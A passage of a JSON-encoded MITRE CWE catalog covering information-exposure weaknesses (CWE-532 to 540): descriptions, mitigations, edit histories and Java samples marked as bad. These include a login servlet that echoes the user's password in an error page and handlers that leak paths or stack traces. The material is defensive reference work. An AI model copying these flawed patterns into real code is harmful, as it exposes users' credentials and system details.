log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999036"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO13-J","Entry_Name":"Do not log sensitive information outside a trust boundary"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"215"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Type"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Fortify Software","Contribution_Date":"2009-07-15","Contribution_Comment":"Portions of Mitigations, Consequences and Description derived from content submitted by Fortify Software."},"Previous_Entry_Name":[{"#text":"Information Leak Through Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Log Files","attr":{"@_Date":"2019-06-20"}},{"#text":"Inclusion of Sensitive Information in Log Files","attr":{"@_Date":"2020-02-24"}}]}},"533":{"attr":{"@_ID":"533","@_Name":"DEPRECATED: Information Exposure Through Server Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level.  See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Affected_Resources, Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Server Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Server Log Files","attr":{"@_Date":"2018-03-27"}}]}},"534":{"attr":{"@_ID":"534","@_Name":"DEPRECATED: Information Exposure Through Debug Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level.  See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Debug Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Debug Log Files","attr":{"@_Date":"2018-03-27"}}]}},"535":{"attr":{"@_ID":"535","@_Name":"Exposure of Information Through Shell Error Message","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A command shell error message indicates that there exists an unhandled exception in the web application code. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Shell Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Shell Error Message","attr":{"@_Date":"2020-02-24"}}]}},"536":{"attr":{"@_ID":"536","@_Name":"Servlet Runtime Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A servlet error message indicates that there exists an unhandled exception in your web application code and may provide useful information to an attacker.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The error message may contain the location of the file in which the offending function is located. This may disclose the web root\'s absolute path as well as give the attacker the location of application files or configuration information. It may even disclose the portion of code that failed. In many cases, an attacker can use the data to launch further attacks against the system."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following servlet code does not catch runtime exceptions, meaning that if such an exception were to occur, the container may display potentially dangerous information (such as a full stack trace).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");if (username.length() &lt; 10) {}","xhtml:br":["","",""],"xhtml:i":"// May cause unchecked NullPointerException.","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Servlet Runtime Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Servlet Runtime Error Message","attr":{"@_Date":"2020-02-24"}}]}},"537":{"attr":{"@_ID":"537","@_Name":"Java Runtime Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In many cases, an attacker can leverage the conditions that cause unhandled exception errors in order to gain unauthorized access to the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not expose sensitive error information to the user."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the class InputFileRead enables an input file to be read using a FileReader object. In the constructor of this class a default input file path is set to some directory on the local file system and the method setInputFile must be called to set the name of the input file to be read in the default directory. The method readInputFile will create the FileReader object and will read the contents of the file. If the method setInputFile is not called prior to calling the method readInputFile then the File object will remain null when initializing the FileReader object. A Java RuntimeException will be raised, and an error message will be output to the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class InputFileRead {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private File readFile = null;private FileReader reader = null;private String inputFilePath = null;private final String DEFAULT_FILE_PATH = \\"c:\\\\\\\\somedirectory\\\\\\\\\\";public InputFileRead() {}public void setInputFile(String inputFile) {}public void readInputFile() {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"inputFilePath = DEFAULT_FILE_PATH;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* Assume appropriate validation / encoding is used and privileges / permissions are preserved */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (RuntimeException rex) {} catch (FileNotFoundException ex) {...}","xhtml:div":[{"#text":"reader = new FileReader(readFile);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Error: Cannot open input file in the directory \\" + inputFilePath);System.err.println(\\"Input file has not been set, call setInputFile method before calling readInputFile\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}]}}}},"Body_Text":"However, the error message output to the user contains information regarding the default directory on the local file system. This information can be exploited and may lead to unauthorized access or use of the system. Any Java RuntimeExceptions that are handled should not expose sensitive information to the user."},{"Intro_Text":"In the example below, the BankManagerLoginServlet servlet class will process a login request to determine if a user is authorized to use the BankManager Web service. The doPost method will retrieve the username and password from the servlet request and will determine if the user is authorized. If the user is authorized the servlet will go to the successful login page. Otherwise, the servlet will raise a FailedLoginException and output the failed login message to the error page of the service.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManagerLoginServlet extends HttpServlet {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FailedLoginException ex) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");String password = request.getParameter(\\"password\\");BankManager bankMgr = new BankManager();boolean isAuthentic = bankMgr.authenticateUser(username, password);if (isAuthentic) {}else {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// Get username and password from login page request","// Authenticate user","// If user is authenticated then go to successful login page"],"xhtml:div":[{"#text":"request.setAttribute(\\"login\\", new String(\\"Login Successful.\\"));getServletContext().getRequestDispatcher(\\"/BankManagerServiceLoggedIn.jsp\\"). forward(request, response);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw new FailedLoginException(\\"Failed Login for user \\" + username + \\" with password \\" + password);","xhtml:br":["",""],"xhtml:i":"// Otherwise, raise failed login exception and output unsuccessful login message to error page"}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"request.setAttribute(\\"error\\", new String(\\"Login Error\\"));request.setAttribute(\\"message\\", ex.getMessage());getServletContext().getRequestDispatcher(\\"/ErrorPage.jsp\\").forward(request, response);","xhtml:br":["","","",""],"xhtml:i":"// output failed login message to error page"}}]}}}}}},"Body_Text":"However, the output message generated by the FailedLoginException includes the user-supplied password. Even if the password is erroneous, it is probably close to the correct password. Since it is printed to the user\'s page, anybody who can see the screen display will be able to see the password. Also, if the page is cached, the password might be written to disk."}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Java Runtime Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Java Runtime Error Message","attr":{"@_Date":"2020-02-24"}}]}},"538":{"attr":{"@_ID":"538","@_Name":"Insertion of Sensitive Information into Externally-Accessible File or Directory","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","System Configuration"],"Description":"Do not expose file and directory information to the user."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"95"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 12: Information Leakage.&#34; Page 191"}}},"Notes":{"Note":[{"#text":"Depending on usage, this could be a weakness or a category. Further study of all its children is needed, and the entire sub-tree may need to be clarified. The current organization is based primarily on the exposure of sensitive information as a consequence, instead of as a primary weakness.","attr":{"@_Type":"Maintenance"}},{"#text":"There is a close relationship with CWE-552, which is more focused on weaknesses. As a result, it may be more appropriate to convert CWE-538 to a category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Maintenance_Notes, Name"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"File and Directory Information Leaks","attr":{"@_Date":"2009-12-28"}},{"#text":"File and Directory Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"539":{"attr":{"@_ID":"539","@_Name":"Use of Persistent Cookies Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application uses persistent cookies, but the cookies contain sensitive information.","Extended_Description":"Cookies are small bits of data that are sent by the web application but stored locally in the browser. This lets the application use the cookie to pass information between pages and store variable information. The web application controls what information is stored in a cookie and how it is used. Typical types of information stored in cookies are session identifiers, personalization and customization information, and in rare cases even usernames to enable automated logins. There are two different types of cookies: session cookies and persistent cookies. Session cookies just live in the browser\'s memory and are not stored anywhere, but persistent cookies are stored on the browser\'s hard drive.   This can cause security and privacy issues depending on the information stored in the cookie and how it is accessed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not store sensitive information in persistent cookies."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Persistent Cookies","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Persistent Cookies","attr":{"@_Date":"2020-02-24"}}]}},"540":{"attr":{"@_ID":"540","@_Name":"Inclusion of Sensitive Information in Source Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Source code on a web server or repository often contains sensitive information and should generally not be accessible to users.","Extended_Description":"There are situations where it is critical to remove source code from an area or server. For example, obtaining Perl source code on a system allows an attacker to understand the logic of the script and extract extremely useful information such as code bugs or logins and passwords.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include removing this script from the web server and moving it to a location not accessible from the Internet."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 